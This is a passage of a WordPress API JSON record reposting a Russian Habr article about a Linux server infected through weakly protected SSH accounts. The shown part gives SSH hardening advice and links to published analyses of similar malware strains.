\u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043e\u0442\u043a\u0440\u044b\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a ssh \u0438 \u0435\u0441\u0442\u044c \u043c\u043d\u043e\u0433\u043e 
\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439. \u0412 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438, \u044d\u0442\u043e \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0435\u0440\u043e\u0432 \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432. \u0418\u0437\u0432\u0435\u0441\u0442\u0435\u043d \u0441\u043b\u0443\u0447\u0430\u0439 <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2019\/05\/23\/uncovering-linux-based-cyberattack-using-azure-security-center\/\">\u041c\u0430\u0441\u0441\u043e\u0432\u043e\u0433\u043e \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 Azure \u0432 \u043c\u0430\u0435 2019<\/a><\/p>\n<p>  <\/p>\n<h2 id=\"kak-zaschititsya-ot-podobnyh-atak\">\u041a\u0430\u043a \u0437\u0430\u0449\u0438\u0442\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0445 \u0430\u0442\u0430\u043a?<\/h2>\n<p>  <\/p>\n<ul>\n<li>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0439\u0442\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u044b\u0435 \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u0432\u0441\u0435\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439<\/li>\n<li><a href=\"https:\/\/www.ostechnix.com\/how-to-set-password-policies-in-linux\/\">\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0443 \u043f\u0430\u0440\u043e\u043b\u0435\u0439<\/a> \u0434\u043b\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b<\/li>\n<li>\u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0435 <code>fail2ban<\/code> \u0438 rate limit \u043d\u0430 ssh 
\u0447\u0435\u0440\u0435\u0437 <code>ufw<\/code> \u0438\u043b\u0438 \u043b\u044e\u0431\u043e\u0439 \u0434\u0440\u0443\u0433\u043e\u0439 \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u043b<\/li>\n<li>\u041e\u0433\u0440\u0430\u043d\u0438\u0447\u044c\u0442\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a ssh \u043f\u043e\u0440\u0442\u0443 \u0441\u043f\u0438\u0441\u043a\u043e\u043c \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 IP \u0430\u0434\u0440\u0435\u0441\u043e\u0432<\/li>\n<li>\u041e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043b\u043e\u0433\u0438\u043d\u0430 \u0432 shell \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0442\u0443\u0434\u0430 \u0445\u043e\u0434\u0438\u0442\u044c \u043d\u0435 \u0434\u043e\u043b\u0436\u043d\u044b<\/li>\n<\/ul>\n<p>  <\/p>\n<h2 id=\"analitika-i-sluchai-zarazheniya-pohozhimi-shtammami\">\u0410\u043d\u0430\u043b\u0438\u0442\u0438\u043a\u0430 \u0438 \u0441\u043b\u0443\u0447\u0430\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u043f\u043e\u0445\u043e\u0436\u0438\u043c\u0438 \u0448\u0442\u0430\u043c\u043c\u0430\u043c\u0438<\/h2>\n<p>  <\/p>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2019\/05\/23\/uncovering-linux-based-cyberattack-using-azure-security-center\/\">\u041c\u0430\u0441\u0441\u043e\u0432\u043e\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 Azure \u0432 \u043c\u0430\u0435 2019<\/a><\/li>\n<li><a href=\"https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor\/\">\u0414\u0435\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 TrendMicro<\/a><\/li>\n<li><a 
href=\"https:\/\/askubuntu.com\/questions\/1115770\/crond64-tsm-virus-in-ubuntu\/1198932\">\u0417\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f Kodi<\/a><\/li>\n<li><a href=\"https:\/\/www.joesandbox.com\/analysis\/194469\/0\/html\">\u0410\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 Joesandbox<\/a><\/li>\n<li><a href=\"https:\/\/www.virustotal.com\/gui\/file\/d4f677f570047fc1bb57cc0dfca19155c3504c72c3ff34b9ab7986c9c216fb90\/detection\">\u0410\u043d\u0430\u043b\u0438\u0437 \u043d\u0430 VirusTotal<\/a><\/li>\n<li><a href=\"https:\/\/www.infosecurity-magazine.com\/news\/graboid-terrorizing-docker-hosts\/\">\u041e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u043f\u043e\u0445\u043e\u0436\u0435\u0433\u043e \u0447\u0435\u0440\u0432\u044f \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Graboid<\/a><\/li>\n<\/ul>\n<\/div>\n<p>               <script class=\"js-mediator-script\">!function(e){function t(t,n){if(!(n in e)){for(var r,a=e.document,i=a.scripts,o=i.length;o--;)if(-1!==i[o].src.indexOf(t)){r=i[o];break}if(!r){r=a.createElement(\"script\"),r.type=\"text\/javascript\",r.async=!0,r.defer=!0,r.src=t,r.charset=\"UTF-8\";var d=function(){var e=a.getElementsByTagName(\"script\")[0];e.parentNode.insertBefore(r,e)};\"[object Opera]\"==e.opera?a.addEventListener?a.addEventListener(\"DOMContentLoaded\",d,!1):e.attachEvent(\"onload\",d):d() } } }t(\"\/\/mediator.mail.ru\/script\/2820404\/\",\"_mediator\")}(window);<\/script>      <br \/> \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/post\/482784\/\"> https:\/\/habr.com\/ru\/post\/482784\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\n<div class=\"post__text post__text-html js-mediator-article\" 
id=\"post-content-body\" data-io-article-url=\"https:\/\/habr.com\/ru\/post\/482784\/\">\n<p>\u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u043e\u0439 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 IP \u0431\u044b\u043b \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043d \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 IVI \u0441 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0435\u043c<\/p>\n<p>  <\/p>\n<pre><code class=\"plaintext\">\u0412\u0430\u0448 ip-\u0430\u0434\u0440\u0435\u0441 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0430\u043d\u043e\u043d\u0438\u043c\u043d\u044b\u0439.  \u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u0435\u0441\u044c \u043a \u0441\u0432\u043e\u0435\u043c\u0443 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0443. IP \u0430\u0434\u0440\u0435\u0441 &lt;IP&gt;. 
\u0414\u0430\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b maxmind.com<\/code><\/pre>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-296720","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/296720","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=296720"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/296720\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=296720"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=296720"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=296720"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}